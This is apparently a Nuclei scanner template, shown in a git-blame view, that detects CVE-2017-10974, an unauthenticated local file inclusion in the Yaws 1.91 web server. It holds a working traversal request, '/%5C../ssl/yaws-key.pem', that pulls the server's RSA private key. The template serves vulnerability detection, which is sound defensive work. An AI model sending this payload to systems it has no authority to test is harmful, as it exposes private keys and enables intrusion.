2021-11-08 22:38:40 +00:00
|
|
|
id: CVE-2017-10974
|
|
|
|
|
|
|
|
info:
|
2022-06-09 20:35:21 +00:00
|
|
|
name: Yaws 1.91 - Local File Inclusion
|
2021-11-08 22:38:40 +00:00
|
|
|
author: 0x_Akoko
|
|
|
|
severity: high
|
2022-06-09 20:35:21 +00:00
|
|
|
description: Yaws 1.91 allows unauthenticated local file inclusion via /%5C../ submitted to port 8080.
|
2023-09-06 13:22:34 +00:00
|
|
|
remediation: |
|
|
|
|
Upgrade to a patched version of Yaws or apply the necessary security patches.
|
2021-11-09 16:43:59 +00:00
|
|
|
reference:
|
|
|
|
- https://www.exploit-db.com/exploits/42303
|
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2017-10974
|
2022-05-17 09:18:12 +00:00
|
|
|
- http://hyp3rlinx.altervista.org/advisories/YAWS-WEB-SERVER-v1.91-UNAUTHENTICATED-REMOTE-FILE-DISCLOSURE.txt
|
2022-06-09 20:46:20 +00:00
|
|
|
- https://www.exploit-db.com/exploits/42303/
|
2021-11-08 22:38:40 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
|
|
cvss-score: 7.5
|
|
|
|
cve-id: CVE-2017-10974
|
|
|
|
cwe-id: CWE-22
|
2023-07-11 19:49:27 +00:00
|
|
|
epss-score: 0.96161
|
2023-11-20 05:10:39 +00:00
|
|
|
epss-percentile: 0.99361
|
2023-09-06 13:22:34 +00:00
|
|
|
cpe: cpe:2.3:a:yaws:yaws:1.91:*:*:*:*:*:*:*
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 1
|
2023-07-11 19:49:27 +00:00
|
|
|
vendor: yaws
|
|
|
|
product: yaws
|
|
|
|
tags: edb,cve,cve2017,yaws,lfi
|
2021-11-08 22:38:40 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2021-11-08 22:38:40 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/%5C../ssl/yaws-key.pem"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
2023-07-11 19:49:27 +00:00
|
|
|
- type: dsl
|
|
|
|
dsl:
|
|
|
|
- '!contains(tolower(body), "<html")'
|
|
|
|
|
2021-11-08 22:38:40 +00:00
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "BEGIN RSA PRIVATE KEY"
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2023-11-20 06:22:09 +00:00
|
|
|
# digest: 4a0a004730450221008c30f0ccd1058c80848169ad20064a78aac0ce529c4e0966616b4aa30b750a3502203bdd8a28b4e7fa657b9c42bbbf20a49522a9f6a38c464b3173407e5de9ee82e7:922c64590222798bb761d5b6d8e72950
|